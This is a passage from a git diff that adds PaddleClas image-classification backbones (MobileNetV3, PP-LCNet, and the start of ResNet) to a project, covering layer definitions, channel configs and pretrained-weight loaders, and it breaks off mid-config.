"https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_small_x1_25_pretrained.pdparams", + "MobileNetV3_large_x0_35": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_large_x0_35_pretrained.pdparams", + "MobileNetV3_large_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_large_x0_5_pretrained.pdparams", + "MobileNetV3_large_x0_75": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_large_x0_75_pretrained.pdparams", + "MobileNetV3_large_x1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_large_x1_0_pretrained.pdparams", + "MobileNetV3_large_x1_25": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_large_x1_25_pretrained.pdparams", +} + +__all__ = MODEL_URLS.keys() + +# "large", "small" is just for MobinetV3_large, MobileNetV3_small respectively. +# The type of "large" or "small" config is a list. Each element(list) represents a depthwise block, which is composed of k, exp, se, act, s. +# k: kernel_size +# exp: middle channel number in depthwise block +# c: output channel number in depthwise block +# se: whether to use SE block +# act: which activation to use +# s: stride in depthwise block +NET_CONFIG = { + "large": [ + # k, exp, c, se, act, s + [3, 16, 16, False, "relu", 1], + [3, 64, 24, False, "relu", 2], + [3, 72, 24, False, "relu", 1], + [5, 72, 40, True, "relu", 2], + [5, 120, 40, True, "relu", 1], + [5, 120, 40, True, "relu", 1], + [3, 240, 80, False, "hardswish", 2], + [3, 200, 80, False, "hardswish", 1], + [3, 184, 80, False, "hardswish", 1], + [3, 184, 80, False, "hardswish", 1], + [3, 480, 112, True, "hardswish", 1], + [3, 672, 112, True, "hardswish", 1], + [5, 672, 160, True, "hardswish", 2], + [5, 960, 160, True, "hardswish", 1], + [5, 960, 160, True, "hardswish", 1], + ], + "small": [ + # k, exp, c, se, act, s + [3, 16, 16, True, "relu", 2], + [3, 72, 24, False, "relu", 2], + [3, 88, 24, False, "relu", 1], + [5, 96, 40, True, "hardswish", 2], + [5, 240, 40, True, "hardswish", 1], + [5, 240, 40, True, "hardswish", 1], + [5, 120, 48, True, "hardswish", 1], + [5, 144, 48, True, "hardswish", 1], + [5, 288, 96, True, "hardswish", 2], + [5, 576, 96, True, "hardswish", 1], + [5, 576, 96, True, "hardswish", 1], + ] +} +# first conv output channel number in MobileNetV3 +STEM_CONV_NUMBER = 16 +# last second conv output channel for "small" +LAST_SECOND_CONV_SMALL = 576 +# last second conv output channel for "large" +LAST_SECOND_CONV_LARGE = 960 +# last conv output channel number for "large" and "small" +LAST_CONV = 1280 + + +def _make_divisible(v, divisor=8, min_value=None): + if min_value is None: + min_value = divisor + new_v = max(min_value, int(v + divisor / 2) // divisor * divisor) + if new_v < 0.9 * v: + new_v += divisor + return new_v + + +def _create_act(act): + if act == "hardswish": + return nn.Hardswish() + elif act == "relu": + return nn.ReLU() + elif act is None: + return None + else: + raise RuntimeError( + "The activation function is not supported: {}".format(act)) + + +class MobileNetV3(TheseusLayer): + """ + MobileNetV3 + Args: + config: list. MobileNetV3 depthwise blocks config. + scale: float=1.0. The coefficient that controls the size of network parameters. + class_num: int=1000. The number of classes. + inplanes: int=16. The output channel number of first convolution layer. + class_squeeze: int=960. The output channel number of penultimate convolution layer. + class_expand: int=1280. The output channel number of last convolution layer. + dropout_prob: float=0.2. Probability of setting units to zero. + Returns: + model: nn.Layer. Specific MobileNetV3 model depends on args. + """ + + def __init__(self, + config, + scale=1.0, + class_num=1000, + inplanes=STEM_CONV_NUMBER, + class_squeeze=LAST_SECOND_CONV_LARGE, + class_expand=LAST_CONV, + dropout_prob=0.2, + return_patterns=None): + super().__init__() + + self.cfg = config + self.scale = scale + self.inplanes = inplanes + self.class_squeeze = class_squeeze + self.class_expand = class_expand + self.class_num = class_num + + self.conv = ConvBNLayer( + in_c=3, + out_c=_make_divisible(self.inplanes * self.scale), + filter_size=3, + stride=2, + padding=1, + num_groups=1, + if_act=True, + act="hardswish") + + self.blocks = nn.Sequential(* [ + ResidualUnit( + in_c=_make_divisible(self.inplanes * self.scale if i == 0 else + self.cfg[i - 1][2] * self.scale), + mid_c=_make_divisible(self.scale * exp), + out_c=_make_divisible(self.scale * c), + filter_size=k, + stride=s, + use_se=se, + act=act) for i, (k, exp, c, se, act, s) in enumerate(self.cfg) + ]) + + self.last_second_conv = ConvBNLayer( + in_c=_make_divisible(self.cfg[-1][2] * self.scale), + out_c=_make_divisible(self.scale * self.class_squeeze), + filter_size=1, + stride=1, + padding=0, + num_groups=1, + if_act=True, + act="hardswish") + + self.avg_pool = AdaptiveAvgPool2D(1) + + self.last_conv = Conv2D( + in_channels=_make_divisible(self.scale * self.class_squeeze), + out_channels=self.class_expand, + kernel_size=1, + stride=1, + padding=0, + bias_attr=False) + + self.hardswish = nn.Hardswish() + self.dropout = Dropout(p=dropout_prob, mode="downscale_in_infer") + self.flatten = nn.Flatten(start_axis=1, stop_axis=-1) + + self.fc = Linear(self.class_expand, class_num) + if return_patterns is not None: + self.update_res(return_patterns) + self.register_forward_post_hook(self._return_dict_hook) + + def forward(self, x): + x = self.conv(x) + x = self.blocks(x) + x = self.last_second_conv(x) + x = self.avg_pool(x) + x = self.last_conv(x) + x = self.hardswish(x) + x = self.dropout(x) + x = self.flatten(x) + x = self.fc(x) + + return x + + +class ConvBNLayer(TheseusLayer): + def __init__(self, + in_c, + out_c, + filter_size, + stride, + padding, + num_groups=1, + if_act=True, + act=None): + super().__init__() + + self.conv = Conv2D( + in_channels=in_c, + out_channels=out_c, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=num_groups, + bias_attr=False) + self.bn = BatchNorm( + num_channels=out_c, + act=None, + param_attr=ParamAttr(regularizer=L2Decay(0.0)), + bias_attr=ParamAttr(regularizer=L2Decay(0.0))) + self.if_act = if_act + self.act = _create_act(act) + + def forward(self, x): + x = self.conv(x) + x = self.bn(x) + if self.if_act: + x = self.act(x) + return x + + +class ResidualUnit(TheseusLayer): + def __init__(self, + in_c, + mid_c, + out_c, + filter_size, + stride, + use_se, + act=None): + super().__init__() + self.if_shortcut = stride == 1 and in_c == out_c + self.if_se = use_se + + self.expand_conv = ConvBNLayer( + in_c=in_c, + out_c=mid_c, + filter_size=1, + stride=1, + padding=0, + if_act=True, + act=act) + self.bottleneck_conv = ConvBNLayer( + in_c=mid_c, + out_c=mid_c, + filter_size=filter_size, + stride=stride, + padding=int((filter_size - 1) // 2), + num_groups=mid_c, + if_act=True, + act=act) + if self.if_se: + self.mid_se = SEModule(mid_c) + self.linear_conv = ConvBNLayer( + in_c=mid_c, + out_c=out_c, + filter_size=1, + stride=1, + padding=0, + if_act=False, + act=None) + + def forward(self, x): + identity = x + x = self.expand_conv(x) + x = self.bottleneck_conv(x) + if self.if_se: + x = self.mid_se(x) + x = self.linear_conv(x) + if self.if_shortcut: + x = paddle.add(identity, x) + return x + + +# nn.Hardsigmoid can't transfer "slope" and "offset" in nn.functional.hardsigmoid +class Hardsigmoid(TheseusLayer): + def __init__(self, slope=0.2, offset=0.5): + super().__init__() + self.slope = slope + self.offset = offset + + def forward(self, x): + return nn.functional.hardsigmoid( + x, slope=self.slope, offset=self.offset) + + +class SEModule(TheseusLayer): + def __init__(self, channel, reduction=4): + super().__init__() + self.avg_pool = AdaptiveAvgPool2D(1) + self.conv1 = Conv2D( + in_channels=channel, + out_channels=channel // reduction, + kernel_size=1, + stride=1, + padding=0) + self.relu = nn.ReLU() + self.conv2 = Conv2D( + in_channels=channel // reduction, + out_channels=channel, + kernel_size=1, + stride=1, + padding=0) + self.hardsigmoid = Hardsigmoid(slope=0.2, offset=0.5) + + def forward(self, x): + identity = x + x = self.avg_pool(x) + x = self.conv1(x) + x = self.relu(x) + x = self.conv2(x) + x = self.hardsigmoid(x) + return paddle.multiply(x=identity, y=x) + + +def _load_pretrained(pretrained, model, model_url, use_ssld): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def MobileNetV3_small_x0_35(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_small_x0_35 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_35` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["small"], + scale=0.35, + class_squeeze=LAST_SECOND_CONV_SMALL, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_small_x0_35"], + use_ssld) + return model + + +def MobileNetV3_small_x0_5(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_small_x0_5 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_5` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["small"], + scale=0.5, + class_squeeze=LAST_SECOND_CONV_SMALL, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_small_x0_5"], + use_ssld) + return model + + +def MobileNetV3_small_x0_75(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_small_x0_75 + Args: + pretrained: bool=false or str. if `true` load pretrained parameters, `false` otherwise. + if str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x0_75` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["small"], + scale=0.75, + class_squeeze=LAST_SECOND_CONV_SMALL, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_small_x0_75"], + use_ssld) + return model + + +def MobileNetV3_small_x1_0(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_small_x1_0 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x1_0` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["small"], + scale=1.0, + class_squeeze=LAST_SECOND_CONV_SMALL, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_small_x1_0"], + use_ssld) + return model + + +def MobileNetV3_small_x1_25(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_small_x1_25 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x1_25` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["small"], + scale=1.25, + class_squeeze=LAST_SECOND_CONV_SMALL, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_small_x1_25"], + use_ssld) + return model + + +def MobileNetV3_large_x0_35(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_large_x0_35 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_35` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["large"], + scale=0.35, + class_squeeze=LAST_SECOND_CONV_LARGE, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_large_x0_35"], + use_ssld) + return model + + +def MobileNetV3_large_x0_5(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_large_x0_5 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_5` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["large"], + scale=0.5, + class_squeeze=LAST_SECOND_CONV_LARGE, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_large_x0_5"], + use_ssld) + return model + + +def MobileNetV3_large_x0_75(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_large_x0_75 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_75` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["large"], + scale=0.75, + class_squeeze=LAST_SECOND_CONV_LARGE, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_large_x0_75"], + use_ssld) + return model + + +def MobileNetV3_large_x1_0(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_large_x1_0 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x1_0` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["large"], + scale=1.0, + class_squeeze=LAST_SECOND_CONV_LARGE, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_large_x1_0"], + use_ssld) + return model + + +def MobileNetV3_large_x1_25(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_large_x1_25 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x1_25` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["large"], + scale=1.25, + class_squeeze=LAST_SECOND_CONV_LARGE, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_large_x1_25"], + use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/pp_lcnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/pp_lcnet.py new file mode 100644 index 0000000..05bbccd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/pp_lcnet.py @@ -0,0 +1,399 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function + +import paddle +import paddle.nn as nn +from paddle import ParamAttr +from paddle.nn import AdaptiveAvgPool2D, BatchNorm, Conv2D, Dropout, Linear +from paddle.regularizer import L2Decay +from paddle.nn.initializer import KaimingNormal +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "PPLCNet_x0_25": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x0_25_pretrained.pdparams", + "PPLCNet_x0_35": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x0_35_pretrained.pdparams", + "PPLCNet_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x0_5_pretrained.pdparams", + "PPLCNet_x0_75": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x0_75_pretrained.pdparams", + "PPLCNet_x1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x1_0_pretrained.pdparams", + "PPLCNet_x1_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x1_5_pretrained.pdparams", + "PPLCNet_x2_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x2_0_pretrained.pdparams", + "PPLCNet_x2_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x2_5_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + +# Each element(list) represents a depthwise block, which is composed of k, in_c, out_c, s, use_se. +# k: kernel_size +# in_c: input channel number in depthwise block +# out_c: output channel number in depthwise block +# s: stride in depthwise block +# use_se: whether to use SE block + +NET_CONFIG = { + "blocks2": + #k, in_c, out_c, s, use_se + [[3, 16, 32, 1, False]], + "blocks3": [[3, 32, 64, 2, False], [3, 64, 64, 1, False]], + "blocks4": [[3, 64, 128, 2, False], [3, 128, 128, 1, False]], + "blocks5": [[3, 128, 256, 2, False], [5, 256, 256, 1, False], + [5, 256, 256, 1, False], [5, 256, 256, 1, False], + [5, 256, 256, 1, False], [5, 256, 256, 1, False]], + "blocks6": [[5, 256, 512, 2, True], [5, 512, 512, 1, True]] +} + + +def make_divisible(v, divisor=8, min_value=None): + if min_value is None: + min_value = divisor + new_v = max(min_value, int(v + divisor / 2) // divisor * divisor) + if new_v < 0.9 * v: + new_v += divisor + return new_v + + +class ConvBNLayer(TheseusLayer): + def __init__(self, + num_channels, + filter_size, + num_filters, + stride, + num_groups=1): + super().__init__() + + self.conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=num_groups, + weight_attr=ParamAttr(initializer=KaimingNormal()), + bias_attr=False) + + self.bn = BatchNorm( + num_filters, + param_attr=ParamAttr(regularizer=L2Decay(0.0)), + bias_attr=ParamAttr(regularizer=L2Decay(0.0))) + self.hardswish = nn.Hardswish() + + def forward(self, x): + x = self.conv(x) + x = self.bn(x) + x = self.hardswish(x) + return x + + +class DepthwiseSeparable(TheseusLayer): + def __init__(self, + num_channels, + num_filters, + stride, + dw_size=3, + use_se=False): + super().__init__() + self.use_se = use_se + self.dw_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=num_channels, + filter_size=dw_size, + stride=stride, + num_groups=num_channels) + if use_se: + self.se = SEModule(num_channels) + self.pw_conv = ConvBNLayer( + num_channels=num_channels, + filter_size=1, + num_filters=num_filters, + stride=1) + + def forward(self, x): + x = self.dw_conv(x) + if self.use_se: + x = self.se(x) + x = self.pw_conv(x) + return x + + +class SEModule(TheseusLayer): + def __init__(self, channel, reduction=4): + super().__init__() + self.avg_pool = AdaptiveAvgPool2D(1) + self.conv1 = Conv2D( + in_channels=channel, + out_channels=channel // reduction, + kernel_size=1, + stride=1, + padding=0) + self.relu = nn.ReLU() + self.conv2 = Conv2D( + in_channels=channel // reduction, + out_channels=channel, + kernel_size=1, + stride=1, + padding=0) + self.hardsigmoid = nn.Hardsigmoid() + + def forward(self, x): + identity = x + x = self.avg_pool(x) + x = self.conv1(x) + x = self.relu(x) + x = self.conv2(x) + x = self.hardsigmoid(x) + x = paddle.multiply(x=identity, y=x) + return x + + +class PPLCNet(TheseusLayer): + def __init__(self, + scale=1.0, + class_num=1000, + dropout_prob=0.2, + class_expand=1280): + super().__init__() + self.scale = scale + self.class_expand = class_expand + + self.conv1 = ConvBNLayer( + num_channels=3, + filter_size=3, + num_filters=make_divisible(16 * scale), + stride=2) + + self.blocks2 = nn.Sequential(*[ + DepthwiseSeparable( + num_channels=make_divisible(in_c * scale), + num_filters=make_divisible(out_c * scale), + dw_size=k, + stride=s, + use_se=se) + for i, (k, in_c, out_c, s, se) in enumerate(NET_CONFIG["blocks2"]) + ]) + + self.blocks3 = nn.Sequential(*[ + DepthwiseSeparable( + num_channels=make_divisible(in_c * scale), + num_filters=make_divisible(out_c * scale), + dw_size=k, + stride=s, + use_se=se) + for i, (k, in_c, out_c, s, se) in enumerate(NET_CONFIG["blocks3"]) + ]) + + self.blocks4 = nn.Sequential(*[ + DepthwiseSeparable( + num_channels=make_divisible(in_c * scale), + num_filters=make_divisible(out_c * scale), + dw_size=k, + stride=s, + use_se=se) + for i, (k, in_c, out_c, s, se) in enumerate(NET_CONFIG["blocks4"]) + ]) + + self.blocks5 = nn.Sequential(*[ + DepthwiseSeparable( + num_channels=make_divisible(in_c * scale), + num_filters=make_divisible(out_c * scale), + dw_size=k, + stride=s, + use_se=se) + for i, (k, in_c, out_c, s, se) in enumerate(NET_CONFIG["blocks5"]) + ]) + + self.blocks6 = nn.Sequential(*[ + DepthwiseSeparable( + num_channels=make_divisible(in_c * scale), + num_filters=make_divisible(out_c * scale), + dw_size=k, + stride=s, + use_se=se) + for i, (k, in_c, out_c, s, se) in enumerate(NET_CONFIG["blocks6"]) + ]) + + self.avg_pool = AdaptiveAvgPool2D(1) + + self.last_conv = Conv2D( + in_channels=make_divisible(NET_CONFIG["blocks6"][-1][2] * scale), + out_channels=self.class_expand, + kernel_size=1, + stride=1, + padding=0, + bias_attr=False) + + self.hardswish = nn.Hardswish() + self.dropout = Dropout(p=dropout_prob, mode="downscale_in_infer") + self.flatten = nn.Flatten(start_axis=1, stop_axis=-1) + + self.fc = Linear(self.class_expand, class_num) + + def forward(self, x): + x = self.conv1(x) + + x = self.blocks2(x) + x = self.blocks3(x) + x = self.blocks4(x) + x = self.blocks5(x) + x = self.blocks6(x) + + x = self.avg_pool(x) + x = self.last_conv(x) + x = self.hardswish(x) + x = self.dropout(x) + x = self.flatten(x) + x = self.fc(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def PPLCNet_x0_25(pretrained=False, use_ssld=False, **kwargs): + """ + PPLCNet_x0_25 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `PPLCNet_x0_25` model depends on args. + """ + model = PPLCNet(scale=0.25, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x0_25"], use_ssld) + return model + + +def PPLCNet_x0_35(pretrained=False, use_ssld=False, **kwargs): + """ + PPLCNet_x0_35 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `PPLCNet_x0_35` model depends on args. + """ + model = PPLCNet(scale=0.35, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x0_35"], use_ssld) + return model + + +def PPLCNet_x0_5(pretrained=False, use_ssld=False, **kwargs): + """ + PPLCNet_x0_5 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `PPLCNet_x0_5` model depends on args. + """ + model = PPLCNet(scale=0.5, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x0_5"], use_ssld) + return model + + +def PPLCNet_x0_75(pretrained=False, use_ssld=False, **kwargs): + """ + PPLCNet_x0_75 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `PPLCNet_x0_75` model depends on args. + """ + model = PPLCNet(scale=0.75, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x0_75"], use_ssld) + return model + + +def PPLCNet_x1_0(pretrained=False, use_ssld=False, **kwargs): + """ + PPLCNet_x1_0 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `PPLCNet_x1_0` model depends on args. + """ + model = PPLCNet(scale=1.0, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x1_0"], use_ssld) + return model + + +def PPLCNet_x1_5(pretrained=False, use_ssld=False, **kwargs): + """ + PPLCNet_x1_5 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `PPLCNet_x1_5` model depends on args. + """ + model = PPLCNet(scale=1.5, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x1_5"], use_ssld) + return model + + +def PPLCNet_x2_0(pretrained=False, use_ssld=False, **kwargs): + """ + PPLCNet_x2_0 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `PPLCNet_x2_0` model depends on args. + """ + model = PPLCNet(scale=2.0, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x2_0"], use_ssld) + return model + + +def PPLCNet_x2_5(pretrained=False, use_ssld=False, **kwargs): + """ + PPLCNet_x2_5 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `PPLCNet_x2_5` model depends on args. + """ + model = PPLCNet(scale=2.5, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x2_5"], use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/resnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/resnet.py new file mode 100644 index 0000000..4f79c0d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/resnet.py @@ -0,0 +1,534 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +from paddle.nn import Conv2D, BatchNorm, Linear +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform +import math + +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ResNet18": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet18_pretrained.pdparams", + "ResNet18_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet18_vd_pretrained.pdparams", + "ResNet34": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet34_pretrained.pdparams", + "ResNet34_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet34_vd_pretrained.pdparams", + "ResNet50": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet50_pretrained.pdparams", + "ResNet50_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet50_vd_pretrained.pdparams", + "ResNet101": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet101_pretrained.pdparams", + "ResNet101_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet101_vd_pretrained.pdparams", + "ResNet152": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet152_pretrained.pdparams", + "ResNet152_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet152_vd_pretrained.pdparams", + "ResNet200_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet200_vd_pretrained.pdparams", +} + +__all__ = MODEL_URLS.keys() +''' +ResNet config: dict. + key: depth of ResNet. + values: config's dict of specific model. + keys: + block_type: Two different blocks in ResNet, BasicBlock and BottleneckBlock are optional. + block_depth: The number of blocks in different stages in ResNet. + num_channels: The number of channels to enter the next stage. +''' +NET_CONFIG = { + "18": { + "block_type": "BasicBlock", + "block_depth": [2, 2, 2, 2], + "num_channels": [64, 64, 128, 256] + }, + "34": { + "block_type": "BasicBlock", + "block_depth": [3, 4, 6, 3], + "num_channels": [64, 64, 128, 256] + }, + "50": { + "block_type": "BottleneckBlock", + "block_depth": [3, 4, 6, 3], + "num_channels": [64, 256, 512, 1024] + }, + "101": { + "block_type": "BottleneckBlock", + "block_depth": [3, 4, 23, 3], + "num_channels": [64, 256, 512, 1024] + }, + "152": { + "block_type": "BottleneckBlock", + "block_depth": [3, 8, 36, 3], + "num_channels": [64, 256, 512, 1024] + }, + "200": { + "block_type": 